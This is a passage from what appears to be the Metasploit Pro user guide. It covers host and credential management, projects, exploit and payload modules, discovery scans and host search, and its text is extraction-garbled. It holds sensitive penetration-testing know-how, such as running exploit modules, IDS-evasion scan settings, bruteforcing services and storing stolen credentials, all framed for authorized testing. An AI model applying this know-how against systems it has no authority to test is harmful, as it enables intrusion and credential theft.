Notification Center displays alerts when the following events occur:
l
A MetaModulerun completes. A task run, such as a Discovery Scan or Bruteforce Attack, completes. A software update is available.
Notification Center
55
2. Click the Show dropdown button and choose the event type you want to use to sort the notifications. You can choose from MetaModules, Tasks, and System.
3. After you choose an event type, Notification Center updates the alerts.
Clearing a Notification
1. From the Global Menu, click on theNotificationCenter icon.
Clearing a Notification
56
57
2. When the Software Updates window appears, select the Use an HTTP Proxy to reach the internet option if you want to use an HTTP proxy server to check for updates. If you select this option, the proxy settings appear. Configure the settings for the HTTP proxy that you want to use. 3. Click the Check for updates button. If an update is available, the system shows you the latest version number and provides an install button for you to use to update the system.
58
3. Identify the current release version of Metasploit that you have installed.
Note: You will see the product edition, the release version, and the update version. For example, in Metasploit Pro 4.6.0 - update 2013050101, the release version is 4.6.0. 4. From the e-mail that you have received from Rapid7, find and download the offline update files that you need. 5. From within Metasploit, select Administration > Software Updates from theGlobal menu.
59
8. Browse to the location of the offline update file and select it.
The offline update file is the bin file that you downloaded from the Rapid7 e-mail. 10. Click the InstallUpdate button.
Metasploit installs the update and restarts the Metasploit service when the update is done. Please wait a few minutes for the service to restart. If there are additional updates that you need to install, you must repeat this process until you have the latest version of Metasploit.
60
4. If an update is available, the system shows you the latest version number and provides an install button for you to use to update the system.
5. Install the update. After the update completes, Metasploit Pro prompts you to restart the back end services. If you restart the services, Metasploit Pro terminates active sessions and requires up to ten minutes to restart.
61
Chapter 4:
Host Management
In Metasploit Pro, a host refers to a device on a network and is represented by its IP address or server name. Hosts are typically fingerprinted, enumerated, and added to a project during a Discovery Scan, data import, or Nexpose Scan. To view the hosts in a project, you need to go to the Analysis area. All hosts stored in the project will be viewable, searchable, and editable from the Analysis area of the user interface. To view the hosts in a project, you need to go to the Analysis area. All hosts stored in the project will be viewable, searchable, and editable from the Analysis area of the user interface. To learn more about host management, read the following topics:
l
Host Management Interfaces on page 63 Viewing and Editing Host Metadata on page 65 Adding, Editing, and Deleting Services on page 71 Adding, Editing, and Deleting Vulnerabilities on page 75 Host Management on page 62 Adding, Editing, Download, and Deleting Captured Data on page 91
62
Project view - Provides a high-level view of all the hosts and data that are stored in the project. To access the project view, click on the Analysis tab. The project view initially shows the Hosts list, which displays the fingerprint and enumerated ports and services for each host. In addition to the Hosts list, you can view the notes, services, vulnerabilities, and captured data from the project view. To access these other views, you can click on their tabs from the project view. Single host view - Displays the details for a specific host, such as the services, sessions, vulnerabilities, credentials, captured data, notes, file shares, tags, exploit attempts, available modules, and source. To access the single host view, click on a host IP address.
Hosts page - Lists all the hosts in a project and shows their operating system, purpose, tags, and counts for services and vulnerabilities. Notes page - Lists the notes, or additional bits of information, that Metasploit Pro was able to collect from a host during a scan. Services page - Lists the services that were enumerated and shows their port number, port state, and the host that it is running on. Vulnerabilities page - Lists the vulnerabilities that have been imported from a vulnerability scanner or ones that have been found by Metasploit Pro. You can create vulnerability exceptions and push validated vulnerabilities back to Nexpose from the Vulnerabilities page. Captured Data page - Lists all the loot and evidence that was collected from all hosts in the project. You can view or download captured data files from this page. Network Topology - Shows a diagram of the physical layout of a target network.
63
64
3. Click on the Edit icon. The Host Information window displays the metadata for the host.
65
3. Click on the Edit icon. The Host Information window displays the metadata for the host.
4. Click on the Edit icon for the metadata field you want to add or modify. The field becomes editable.
Note: Note: The following metadata fields can be edited: host address, host name, host MAC address, OS name, OS flavor, OS service pack, and OS purpose.
66
5. Enter the information you want to use in the field. For example, if you know the service pack, you can add it to the SP field. 6. Click the Save link when you are done.
67
3. Fill out the Name and Address section with the host's network details. At a minimum, you will need to specify the host name and host IP address.
4. Fill out the Operating System section, if you know the OS that runs on the host. If you do not have this information, you can skip this step. Note: Note: You can additionally specify the OS version, OS flavor, and Purpose. These fields are optional.
68
5. Select the Lock edited host attributes option if you do not want the host metadata to be editable. If you select this option, team members and subsequent scans/imports will not be able to modify the host metadata.
6. Click on the Add Service link, if you know there is a specific service running on the host that you want to add. You can add as many services as you need.
69
70
3. Click the New Service button. The New Service modal window appears.
71
Name - The service name, such as HTTP, DNS, or SMTP. Port - The port that the service runs on. Protocol - The protocol, TCP or UDP, that the port uses. State - The port state can be open, closed, filtered, or unknown. Info - Any additional information that you may have about the service, such as the version that is running.
72
Editing a Service
To edit a service:
1. From within a project, select Analysis > Hosts from the Project Tab bar. The Hosts page appears. 2. Click on the IP address for the host whose services you want to edit. The single host page opens and shows the Services list.
3. Click the Edit icon that is located in the same row as the service you want to modify. The Name, Port, Protocol, and State fields become editable.
Editing a Service
73
3. Find the service that you want to delete. 4. Click the Delete button that is located in the same row as the service. A confirmation window appears.
74
75
4. Click the New Vuln button. The New Vulnerability modal window appears.
6. Click the Add Ref button. The Reference field becomes editable.
8. If you have additional references you would like to add for the vulnerability, click on the Add Ref button and repeat the previous step. 9. Click the Submit button when you are done.
76
4. Click the Edit icon that is located in the same row as the vulnerability you want to edit. The Edit Vulnerability window appears.
77
6. Edit the vulnerability reference ID or URL. 7. Click the Submit button when you are done.
78
4. Click the Edit icon that is located in the same row as the vulnerability you want to edit.
5. Find the reference you want to delete and click the Delete icon. The reference is removed from the list. Note: If you have additional references you would like to delete, repeat the previous step until you are done.
79
4. Click the Delete icon that is located in the same row as the vulnerability you want to remove. A confirmation window appears.
5. Click OK to delete the vulnerability. The vulnerability is removed from the list.
80
2. Click the Grouped View button in the Quick Tasks bar. The project displays the individual vulnerabilities in the project.
3. Select the vulnerabilities you wan to delete from the project. Note: When you delete vulnerabilities from the grouped view, it removes them from all of the hosts that currently have them.
4. Click the Delete Vulnerabilities button in the Quick Tasks bar. A confirmation window appears.
81
82
83
Timestamp - Time the credential was added to the project. Service - The service that was authenticated with the credentials. Type - The type of loot collected, such as read/write password, read-only password, SMBhash, SSH public key, or SSHprivate key.
84
User - The user name that can be used to authenticate a service. Password, Hash, or SSH Key Fingerprint - The plaintext password or raw data for an SMBhash or SSH key that can be used to authenticate a service. Source Credential or Session - Indicates how the loot was obtained. Sources can be one of the following:
l
Guessed - The source type indicates that the credentials were obtained from a bruteforce attack. Imported - The source type indicates that the credentials were obtained from a credentials list import. Unverified - The source type indicates an inactive credential. Unknown - The source type indicates that Metasploit Pro was unable to find a source match. <User:pass> - The source type indicates that the credential pair was created by from another credential pair. Link to a session - The source type indicates that the credentials were obtained from collecting evidenced from an active session.
85
4. Click the New Cred button. The New Credentials modal window appears.
Service - The service that can be authenticated with the credentials. The most common ports and services are listed for you to choose from. Type - The type of credentials that you are adding. Choose between the following credential types: read/write, read-only, SMB hash, SSH private key, and SSH public key. User - The user name for the credential pair. Password - The password, hash, or key for the credential pair. Note: You can leave the user name and passwords fields empty for blank credentials. If you are adding an SSH key, you will need to copy and paste the contents of the key into the Password field.
86
6. Click the Submit button when you are done. The credential pair is added to the Credentials list.
87
4. Click the Edit icon that is located in the same row as the credential pair you want to modify. The Service, Type, User, and Password fields become editable.
88
89
5. Click the Delete button that is located in the same row as the credential pair. A confirmation window appears.
90
3. Click the Captured Data tab. The Captured Data list appears.
91
4. Click the New Captured Data button. The New Captured Data modal window appears.
5. Click the Choose File button to navigate to the location of the file you want to upload. Note: You can upload any type of loot that you've collected, such as password files, screenshots, and system files.
6. Enter a name for the file in the Name field. By default, this field is populated with the original file name. 7. Enter the content type. For example, the content type can be any of the supported MIME content types, like text/plain, image/jpeg, or text/html. 8. Enter any additional information you want to provide about the file in the Info field. 9. Click Submit when you are ready to upload the file.
92
3. Click the Captured Data tab. The Captured Data list appears.
4. Find the captured data file you want to download. If you have more than 10 files, you can either click on the page numbers to navigate through the captured data files or you can increase the number of entries that the page displays. 5. Click the Download link that is located in the same row as the file you want to download. The file is downloaded and saved to your local system.
93
3. Click the Captured Data tab. The Captured Data list appears.
4. Find the captured data file you want to view. If you have more than 10 files, you can either click on the page numbers to navigate through the captured data files or you can increase the number of entries that the page displays.
5. Click the View link that is located in the same row as the file you want to download. The file opens in a modal window.
94
From within a project, select Analysis > Captured Data from the Project Tab bar. The Captured Data page appears and lists all files that are stored in the project. You can download or view files directly from the Captured Data page.
95
Chapter 5:
Projects
The first step to set up a penetration test is to create a project. A project represents the workspace that you use to create and run a test. You create projects to separate your tests and engagements into logical groupings.
l
About Projects on page 97 Project Management on page 98 Team Collaboration on page 109 Host Comments on page 112
About Projects
A project contains the workspace that you use to perform the different steps for a penetration test and store the data that you collect from the target. You create a project to configure tasks and to run tests. You can create as many projects as you need, and you can switch between projects while tasks are in progress. From within a project, you define the target systems that you want to test and configure the tasks that you want to run against those targets. for example, you can scan targets for active services and hosts, attempt to exploit vulnerabilities, collect data from exploited machines, and generate reports that detail your findings. Every project has an owner. The owner can choose the users who can access the project to edit, view, and run tasks. However, users with administrative access can view and edit any project, regardless of whether or not the project owner gives them access. You can create projects to separate an engagement into logical groupings. Oftentimes, you may have different requirements for the various departments, or subnets, within an organization. Therefore, it may be more efficient for you to have different projects to represent those requirements. For example, you may want to create a project for the human resources department and another project for the IT department. Your requirements for these departments may vary greatly, so it would be logical for you to separate the targets into different projects. At the end of the engagement, you can generate separate reports for each department to perform a comparative analysis and present your findings to your organization or client.
Project Components
The following components are part of a project:
l
Name - Provides a unique identifier for the project. Description - Describes the purpose and scope of the project. Network range - Defines the default network range for the project. When you create a project, Metasploit Pro automatically populates the default target range with the network range that you define for the project. Metasploit Pro does not force the project to use the network range unless you enable the network range restriction option. Network range restriction - An option that restricts a project to a specific network range. Enable this option if you want to ensure that the test does not target devices outside the scope of the engagement. If you enable this option, Metasploit Pro will not run tasks against a target whose address does not fall within the network range.
About Projects
97
Project Management
Each project has a name, description, network range, and user access list. As a project owner or an administrator, you can edit the project settings, choose the users who can access the project, and manage the data that the project contains.
Creating a Project
A project is the workspace that you use to build a penetration test. Each project logically groups together the hosts that you want to exploit and the type of information that you want to obtain. Every project has a name, description, and network range. After you create a project, you need to run a discovery scan or an import to bring host data into the project. 1. From the Projects page, click the New Project button.
2. When the New Project page appears, find the Project Settings area, and enter the following information:
Project Management
98
Project name - This is a unique identifier that helps you differentiate between projects. Description - This is a summary of the purpose and scope of the project. Network range - This is the default network range that project uses. The network range sets the default address range that automatically populates the Target Addresses field in discovery scans and Nexpose scans. Metasploit Pro does not enforce the network address range unless you enable the network restriction option. If you want to enter multiple network ranges, use a comma to separate each one.
3. Select Restrict to network range if you want to enforce network boundaries on the project. 4. From the User Access area, select the following information:
Project owner - This is the person who owns the projects. Project members - These are the users who can access, edit, and run the test.
99
3. When the Import Data page appears, click on the Browse button to open the File Upload window.
4. When the File Upload window appears, browse to the location of the Metasploit ZIPfile.
5. If you do not want to import the information for a specific host, you can enter the IPaddress for that host in the Exclude Addresses field. If you need to enter multiple hosts, you need to use a comma to separate each address.
100
6. If you do not want the import to overwrite data for an existing host, you must select the Donot change existing hosts option. 7. Click the Import Data button.
Deleting a Project
When you delete a project, you remove all the data that the project contains, including reports, host data, evidence, vulnerability data, and host tags. After you delete a project, you cannot view or access the project again. If you want to delete the project, but save the project data, you can export the project data. When you export the project data, the system provides you with an XML or ZIP file of the project contents. You can import the XML or ZIP file to bring the project data back into Metasploit Pro. 1. Select Project > Show All Projects from the Main menu.
2. When the Projects page appears, select the projects that you want to delete.
3. ClickDelete.
Deleting a Project
101
2. When the Projects page appears, select the project that you want to assign an owner. 3. Click the Settings button.
4. When the Project Settings page appears, find the User Access area. 5. Click the Project owner dropdown and select the person you want to assign the project to.
102
2. When the Projects page appears, select the project that you want to edit. 3. Click the Settings button.
103
4. When the ProjectSettings page appears, find the User Access area. 5. Select project members to enable them to view and modify the project or deselect project members to prevent them from modifying the project.
2. Select the project that you want to set the network range for.
104
4. In the Network range field, enter the network range that you want to restrict the project to. You can enter a single IP address, an IP range described with hypens, or a standard CIDR notation. If you define a CIDR notation, you can use an asterisk as a wild card. For example 192.168.1.* indicates 192.168.1.1-255.
105
106
3. In the Network range field, enter the network range that you want to restrict the project to. You can enter a single IP address, an IP range described with hyphens, or a standard CIDR notation. If you define a CIDR notation, you can use an asterisk as a wild card. For example 192.168.184.* indicates 192.168.184.1-255.
107
108
Team Collaboration
The multi-user support provides you with the ability to collaborate on an engagement or penetration test with other team members. You and your team can log into the same instance of Metasploit Pro to perform tasks, review data, and share projects. You can access Metasploit Pro through the Metasploit Web UI, which can run on the local machine or across the network. Some features that you can implement to enhance team collaboration are network boundaries, host tags, and host comments. These features help you create separate workloads for each team member and organize an engagement into logical containers. For example, you may want to assign certain hosts to a specific team member to test.
Team Collaboration
109
3. Find the User Access settings. The User Access list displays all Metasploit Pro users. 4. Click the Settings button. 5. Select the users that you want to have access to the project.
110
2. Find the User Access settings. The user access list displays all available Metasploit Pro users. 3. Deselect the users that you do not want to have access to the project.
111
3. Click the Settings button. 4. Find the User Access settings. The User Access list displays all available Metasploit Pro users. 5. From the Project Owner dropdown menu, choose an owner for the project.
Host Comments
You can add a host comment to share information about a host. For example, if you identify a vulnerability on a host, and you want to share that information with other project users, you can add a host comment to that host. When you view the host details, you can see comments that other users have added to the host.
Host Comments
112
2. Click on the name of the host to which you want to add a comment. 3. When the Host Details page appears, click the Update Comment button.
4. Enter the information you want to add to the host in the Comments field. For example, if you know that a host is not exploitable, you can add the information as a comment. When other team members see the note, they know that they should not attempt to exploit the host. 5. Click the Save Comments button.
2. Click on the name of the host to which you want to add a comment.
Host Comments
113
3. When the Host Details page appears, click the Update Comment button.
Host Comments
114
Host Comments
115
Chapter 6:
Modules
About Modules on page 117 Module Search on page 121 Module Statistics on page 123 Modules Types on page 117 Module Rankings on page 124
About Modules
Modules are the underlying core components of the Metasploit Framework. They provide the components and capabilities that Metasploit Pro needs to perform an attack or a execute a task, such as exploiting a target or fingerprinting a host. Every task that Metasploit Pro performs is defined within a module. When you configure tasks and run them from the user interface, Metasploit Pro does a lot of work behind the scenes to select the appropriate modules that it needs to run. For example, the bruteforce attack runs a combination of service specific modules that focus on the services that are running on the target hosts. Metasploit Pro builds an attack plan based on the services that have been identified by the discovery scan or import. If you want to learn more about a particular module, you can use the built-in module search engine or you can visit the Metasploit Exploit Database.
Modules Directory
Your local version of Metasploit Pro has a copy of the Metasploit Framework, which contains most of the modules that the exploit database contains. If you want to review the modules that are available on your local machine, you can browse to $INSTALL/metasploit/msf3/modules. The modules are categorized by type first and by protocol next. For example, you can find FTP fuzzers in the following location: $INSTALL/metasploit/msf3/modules/auxiliary/fuzzers/ftp.
Modules Types
The Metasploit Framework categorizes modules based on the type of action that the module performs. The majority of modules are either an exploit or an auxiliary module. Generally, if a module can obtain a shell on a remote machine, it is an exploit module. Otherwise, it is an auxiliary module.
Exploit Modules
An exploit module executes a sequence of commands to target a specific vulnerability found in a system or application. An exploit module takes advantage of a vulnerability to provide control of the target system. Generally, you use exploit modules to run remote code execution on a target machine and to target remote services and client-side applications. Some examples of exploits include buffer overflow, code injection, and web application exploits.
About Modules
117
An exploit can be a client-side or server-side exploit. A client-side exploit typically occurs through the use of social engineering techniques. Server-side exploits, on the other hand, take advantage of active services on an exposed server.
Auxiliary Modules
Most modules that are not an exploit can be considered an auxiliary module. An auxiliary module is any module that does not execute a payload. Instead, it performs arbitrary actions that may not be directly related to exploitation and provides supplementary support for tasks that you need to perform penetration test. Examples of auxiliary modules include vulnerability scanners, port scanners, fuzzers, and denial of service attacks.
Payload Modules
A payload is the shell code that runs after an exploit successfully compromises a system. The payload enables you to define how you want to connect to the shell and what you want to do to the target system after you take control of it. A payload can open a Meterpreter or command shell. Meterpreter is an advanced payload that allows you to write DLL files to dynamically create new features as you need them. For more information on Meterpreter, see the Meterpreter User Guide.
NOP Modules
A NOP generator produces a series of random bytes that you can use to bypass standard IDS and IPS NOP sled signatures. Use NOP generators to pad buffers.
Post-Exploitation Modules
A post-exploitation module enables you to gather more information or to gain further access to an exploited target system. Examples of post-exploitation modules include hash dumps and application and service enumerators.
Oracle - Affects modules that target Oracle. Lorcon2 - Affects modules that target wireless systems.
118
Libpcap - Affects modules that target sniffers. DECT - Affects modules that target telephony.
Target Addresses - The hosts targeted by the exploit. Leave this field blank to include all hosts in the project. Excluded Addresses - The hosts excluded from the attack. Leave this field blank to include all hosts in the project. Exploit Timeout - The number of minutes the module has before it times out. Payload Type - The type of shell that the exploit obtains. Connection Type - The direction of the connection. Listener Ports - The address for the machine that the listener listens on. Listener Host - The port for the machine that the listener listens on. RPORT - The target port. RHOST - The target address. VHOST - The address for the HTTP virtual server. LHOST - The address for the local host. LPORT- The listener port on the local host.
Running a Module
1. From within a project, select Modules > Search. 2. Use the search engine to find a module. You can utilize the keywords to either narrow down your search or to find a specific module. For example, if you want to search for Windows exploits, you can search for platform:windows, or if you want to search specifically for the ms08-067 exploit, you can search for path:ms08_067_netapi.
119
3. After you find the module that you want to use, click on the module name to open the configuration page.
4. At a minimum, you should define the IPaddresses of the target systems that you want to include or exclude from the exploit. If you do not specify any target addresses, Metasploit Pro includes all hosts that are in the project.
5. Optionally, you can define any advanced options and evasion options that are available. Note: The options that are available vary between different modules. By default, each module is preconfigured with default settings that are appropriate for you to run against a target. The payloads will be preselected based on the intended target. For example, Metasploit Pro will use Meterpreter for Windows targets and the command shell for Linux/UNIX targets. 6. After you configure the options for the module, click the Run Module button to launch the module.
Running a Module
120
Module Search
The module search engine searches the module database for the search term and returns a list of results that match the query. Use the module search engine to find the module that you want to run against a target. You can utilize keyword tags to perform a targeted search. This reduces the number of results that the system returns.
Keyword Tags
You can use keyword tags to define a keyword expression. A keyword tag is a keyword that helps you efficiently search for a module. If you want to search for a module that has a specific author, you can use the CVE tag to search for modules written by them. For example, if you know the CVE ID of the exploit you want to use is 2008-4250, you can search for CVE:2008-4250. This search returns an exploit for the ms08-067 vulnerability. The following table lists the keyword tags:
l
app - Searches for modules that are either a client or server attack. Example: app:client
name - Searches for the keyword expression within the module descriptive name. Example: name:Java
platform - Searches for the modules that affect the platform or target that you define in the keyword expression. Example: platform:linux
Module Search
121
path - Searches for the keyword expression within module path name. Example: path:windows/smb
type - Searches for the modules that belong to the module type that you define in the keyword expression. For example, use exploit, auxiliary, or post. Example: type:exploit
Keyword Tags
122
Module Statistics
Module statistics show the total number of modules that are available and show the number of modules that are available for each type of module. Module types include exploit modules, auxiliary modules, server-side exploits, and client-side exploits.
Module Statistics
123
Module Rankings
Module rankings provide details about the reliability and impact of an exploit on a target system. Every module in the Metasploit Framework has a ranking, which is based on how likely the exploit will disrupt the service. There are six possible rankings. The higher rankings indicate that the exploit is less likely to cause instability or crash the target system. Use the following rankings to determine the reliability of a module:
l
Low - The exploit is unstable and unlikely to be successful. Do not use exploits with a low ranking. Average - The exploit can be unstable and unreliable. Do not use exploits with a normal ranking. Normal - The exploit is generally reliable, but cannot auto-detect the default target Good - The exploit has a default target. Great - The exploit has a default target and can automatically detect the correct target. Excellent - The exploit never crashes the service. Examples of exploits that have an excellent ranking are SQL injections and CMD executions.
Module Rankings
124
Chapter 7:
Scanning
About Scanning on page 126 Discovery Scans on page 127 Discovery Scan Tasks on page 135
About Scanning
Before you can begin the exploitation phase of a penetration test, you must add host data to the project. Host data refers to the IP addresses of the systems that you want to exploit and the active ports, services, and vulnerability information associated with those systems. To add host data to a project, you can either run a discovery scan or you can import scan data from a vulnerability scanner, such as Nexpose or Nessus. If you import data from vulnerability analysis tool, or some other third party vendor, you should still run a discovery scan to identify new or additional information for those hosts. A discovery scan is the port scanner included with Metasploit Pro. It combines Nmap with several modules to identify the systems that are alive and to uncover the open ports and services. A port is a data connection that serves as a gateway for communication and enables traffic to travel between systems. Network services, like SSH, telnet, and HTTP, typically run on standard port numbers and can indicate the purpose of the system. You can use the results to filter the list of attackable targets. For example, if you discover a service that allows remote code execution, like VNC, you can bruteforce the service to attempt to log into the system.
About Scanning
126
Discovery Scans
One of the first steps in penetration testing is reconnaissance. Reconnaissance is the process of gathering information to obtain a better understanding of a network. It enables you to create list of target IP addresses and devise a plan of attack. Once you have a list of IP addresses, you can run a discovery scan to learn more about those hosts. A discovery scan identifies the operating systems that are running on a network, maps those systems to IP addresses, and enumerates the open ports and services on those systems. A discovery scan is the internal Metasploit scanner. It uses Nmap to perform basic TCP port scanning and runs additional scanner modules to gather more information about the target hosts. By default, the discovery scan includes a UDP scan, which sends UDP probes to the most commonly known UDP ports, such as NETBIOS, DHCP, DNS, and SNMP. The discovery scan tests approximately 250 ports that are typically exposed for external services and are more commonly tested during a penetration test. During a discovery scan, Metasploit Pro automatically adds the host data to the project. You can review the host data to obtain a better understanding of the topology of the network and to determine the best way to exploit each target. Oftentimes, the network topology provides insight into the types of applications and devices the target has in place. The more information that you can gather about a target, the more it will help you fine-tune a test for it.
The host status The operating system The open ports The running services
Discovery Scans
127
During the second phase, port scanning, Metasploit Pro runs Nmap to identify the ports that are open and the services are available on those ports. Nmap sends probes to various ports and classifies the responses to determine the current state of the port. The scan covers a wide variety of commonly exposed ports, such as HTTP, telnet, SSH, and FTP. The discovery scan uses the default Nmap settings, but you can add custom Nmap options to customize the Nmap scan. For example, the discovery scan runs a TCP SYN scan by default. If you want to run a TCP Connect Scan instead of a TCP SYN Scan, you can supply the -sT option. Any options that you specify override the default Nmap settings that the discovery scan uses. After the discovery scan identifies the open ports, the third phase begins. Nmap sends a variety of probes to the open ports and detects the service version numbers and operating system based on how the system responds to the probes. The operating system and version numbers provide valuable information about the system and help you identify a possible vulnerability and eliminate false positives. Finally, after Nmap collects all the data and creates a report, Metasploit Pro imports the data into the project. Metasploit Pro uses the service information to send additional modules that target the discovered services and to probe the target for more data. For example, if the discovery scan sweeps a target with telnet probes, the target system may return a login prompt. A login prompt can indicate that the service allows remote access to the system, so at this point, you may want to run a bruteforce attack to crack the credentials.
Standard and well known ports, such as ports 20, 21, 22, 23, 25 53, 80, and 443. Alternative ports for a service, such as ports 8080 and 8442, which are additional ports that HTTP and web services can use. Ports listed as the default port in a module.
In total, the discovery scan includes over 250 ports. If you do not see the port that you want to scan, you can manually add the port to the discovery scan. For example, if you know that your company runs web servers with port 9998 open, you need to manually add port 9998 to the discovery scan. This ensures that the discovery scan includes every port that is potentially open. If you want to scan all ports, you can specify 1-65535 as the port range. Keep in mind that a discovery scan that includes all ports can take several hours to complete. If there is a port that you do not want to scan, you can exclude the port from the discovery scan. The discovery scan will not scan any ports on the excluded list. For example, if your company uses an
128
application that runs on port 1234, and you do not want to affect the applications performance, you can add the port to the excluded list.
Metasploit PWDump Export Metasploit Export XML Metasploit Export ZIP NeXpose XML or XML 2.0 NeXpose Raw XML or XML Export Foundstone Network Inventory XML Microsoft MBSA SecScan XML nCircle IP360 (XMLv3 and ASPL) NetSparker XML Nessus NBE Nessus XML (v1 and v2) Qualys Asset XML Qualys Scan XML Burp Session XML Acunetix XML AppScan XML Nmap XML Retina XML Amap Log IP Address List Libpcap Network Capture
129
Raw XML is only available in commercial editions of Nexpose and includes additional vulnerability information. Note: Metasploit Pro does not import service and port information from Qualys Asset files. If you import a Qualys Asset file, you must run a discovery scan to enumerate services and ports that are active on the imported hosts.
Target addresses
Defines the individual hosts or network range that you want to scan.
Excluded TCPports
Excludes certain TCP ports from service discovery. By default, the port scan covers a specific range of ports. Use this option to add a port that you want to exclude from the scan.
130
instead.
Portscan speed
Controls the Nmap timing option. Choose from the following timing templates:
l
Insane (5) - Speeds up the scan. Assumes that you are on a fast network and sacrifices accuracy for speed. Scan delay is less than 5 ms. Aggressive (4) - Speeds up the scan. Assumes that you are on a fast and reliable network. Scan delay is less than 10 ms. Normal (3) - The default port scan speed. Does not affect the scan. Polite (2) - Uses less bandwidth and target resources to slow the scan. Sneaky (1) - Use this port scan speed for IDS evasion. Paranoid (0) - Use this port scan speed for IDS evasion.
Portscan timeout
Determines the amount of time Nmap spends on each host. The default value is 5 minutes.
UDPservice discovery
Sets the discovery scan to find all services that are on the network. Metasploit uses custom modules instead of Nmap to perform UDP service discovery.
131
SMBpassword
Defines the SMB password that the discovery scan uses to attempt to login to SMB services.
SMB domain
Defines the SMB server name and share name.
IPv6 Addresses
Metasploit Pro does not automatically detect IPv6 addresses during a discovery scan. For hosts with IPv6 addresses, you must know the individual IP addresses that are in use by the target devices and specify
IPv6 Addresses
132
those addresses to Metasploit Pro. To identify individual IPv6 addresses, you can use SNMP, Nmap, or thc-alive6, which is part of the thc-ipv6 toolkit. After you identify the IPv6 addresses for the target devices, you can either import a text file that contains the host addresses into a project or manually add the hosts to a project. If you choose to import the addresses, the text file that you use must list each IPv6 address on a new line. To import a host address file, select Analysis > Hosts > Import. When the Import Data window appears, browse to the location of the host address file and import the host address file. To manually add a host, select Analysis > Hosts> New Host.
VMware ESXi 3.5, 4.0, 4.1, and 5.0 VMware ESX 1.5, 2.5, 3.0, and 4.0 vCenter
133
134
Running a Discovery Scan Viewing the Results from a Discovery Scan Importing Scan Data
3. When the New Discovery Scan window displays, enter the target addresses that you want to include in the scan in the Target addresses field. You can enter a single IP address, an address range, or a CIDR notation. If there are multiple addresses or address ranges, use a newline to separate each entry.
135
4. At this point, you can launch the scan. However, if you want to fine-tune the scan, you can click the Show Advanced Options button to display additional options that you can set for the discovery scan. For example, you can specify the IP addresses that you want to explicitly include and exclude from the scan. 5. When you are ready to run the scan, click the Launch Scan button.
3. When the New Discovery Scan window displays, enter the target addresses that you want to include in the scan in the Target addresses field. You can enter a single IP address, an address range, or a CIDR notation. If there are multiple addresses or address ranges, use a newline to separate each entry.
136
4. Click the Show Advanced Options button. 5. In the CustomTCPsource port field, enter 1720.
137
7. Select the Scan H.323 video endpoints option. By default, this option is enabled. 8. Click the Launch Scan button.
3. When the New Discovery Scan window displays, enter the target addresses that you want to include in the scan in the Target addresses field. You can enter a single IP address, an address range, or a CIDR notation. If there are multiple addresses or address ranges, use a newline to separate each entry.
4. Click the Show Advanced Options button. 5. Under the Advanced Target Settings, find the Custom Nmap arguments field.
138
6. In the Custom Nmap arguments field, enter the Nmap arguments you want to use.
Note: Any command line arguments that you specify takes precedence over the default configuration that Metasploit Pro uses for the discovery scan. 7. Optionally, you can define any advanced options that are available. For example, you can specify the IP addresses that you want to include and exclude from the scan, as well as the target ports, services, scan speed, and scan mode for the discovery scan. 8. When you are ready to run the scan, click the Launch Scan button.
139
Host Management
A host refers to a target machine that you scanned, imported, or manually added to a project. At a minimum, each host has an IP address, a list of active services, and system information. You can manually add a host to a project if you do not have import data for it or if the discovery scan cannot communicate with it. You can configure the details for the host, which includes the network, operating system, and service information. Additional information you can define includes vulnerability information, host comments, and host tags.
Host Management
140
Advanced Search
When you perform a basic search, Metasploit searches all columns in the hosts table. Oftentimes, the search may not be specific enough and returns records that are false positives. For example, if you perform a basic search for Windows, the results may include all hosts that have Windows somewhere in the description, and not hosts that are Windows specific machines. To work around false positives, you can perform an advanced search. In an advanced search, you specify exactly where in the hosts table you want the search to look.This is particularly useful when you want to narrow the results to a specific subset of data.
Search Filter - Refers to the column in the table where you want the search to look. Search Operator - Refers to the operators that you can add to narrow or broaden a search query. A search operator is also known as a connector. Keyword - Refers to a single word or phrase that the search uses to find matching records.
To create an advanced search query, you need to first specify the search filter, followed by the search operator and keyword. Going back to the previous example, if you want to only see hosts that are Windows specific machines, you would use the following search query: os:windows. This query ensures that the search only looks in the OS column of the hosts tables for the Windows keyword and only returns hosts that have been fingerprinted as Windows systems.
Search Operators
Metasploit Pro provides several different types of search operators that you can use to refine your host search. The search operator that you need to use depends on the type of data that you want the search to find.
Text Operators
You should use text operators when you want to perform a full-text search. Typically, you use text operators when you search for any data other than ports or IP addresses. Search Operator Like Operator (:)
Description Add the LIKEoperator to a search query to include all records that have the keyword in the specified column.
Advanced Search
141
Search Operator
Description For example, if you search for os:windows, the search shows any hosts with the keyword, Windows, in the OS field. Add the NOTLIKE operator to a search query to exclude records that have the keyword in
the specified column. For example, if you search for os!:windows, the search does not return any records that contain the keyword, Windows, in the OSfield. Add the EQUALS operator to a search query to return an exact match.
For example, if you search for os=Windows, the search shows all hosts that match the keyword, Windows, in the OS field. However, if the operating system for the host is listed as Microsoft Windows, these records will not appear in the results because they do not match the query exactly. Add the NOTEQUALS operator to exclude records that contain the keyword.
Not Equals Operator (<>) For example, if you search for os<>Windows, the search excludes hosts that exactly match the keyword, Windows, in the OS field. However, if the operating system for the host is listed as Microsoft Windows, these records will appear in the results because they do not match the query. Add the AND operator to a query to combine multiple keywords or search criteria. The And Operator (&&) For example, if you search for os:windows && sp0, the search returns the hosts that match both criteria. Add the OR operator to a search query to include any of your search terms in the resulting Or Operator (||) records. You can use the OR operator to broaden your search. For example, if you search for os:Windows || ip:192.168, the search finds hosts that are running Windows or have a IP address that starts with 192.168. The hosts do not have to match both search criteria. AND operator requires that all the keywords or search criteria appear in the results.
Numeric Operators
You should use numeric operators when you search for integer values or when you want to compare numeric values. Typically, you use numeric operators when you search for IP addresses or ports. Search Operator Equal Operator (= or :) For example, if you search for port:445, the search shows all services that Description Add the equal operator to perform a mathematical equivalency check.
142
Description
Add the not equal operator to perform a mathematical non-equivalency Not Equal Operator (<> or !:) check. For example, if you search for port!:445, the search returns all services except those that are open on port 445. Add a comparison operator to compare two values. Comparison Operator (<, <=, > or, >=) For example, if you search for vulns>0, the search only shows hosts that have vulnerabilities.
Tag Operators
You should use tag operators when you search for host tags. Search Operator Hash Sign (#) For example, if you search for #windows, the search shows any hosts that have the windows host tag.
Description Append the hash sign to any host tag to search for hosts.
Search Filters
In Metasploit, a search filter refers to a column of data in the hosts table. You specify a search filter to specify where you want the search to look in the hosts table. For example, if you want to search for hosts based on the operating system, you should use the os search filter. The search filters that are available depend on the page that you are currently viewing in the Analysis area. When you perform a search, you can only use the search filters that are available for that specific page. Some search filters are global, such as hostname and OS; however, there are some that are specific to the page that you are viewing, such as proto or ref. There are five different pages that you can view from the Analysis area and each has its own set of search filters:
l
143
Read the following sections to learn more about the search filters that each page supports.
Hosts Page
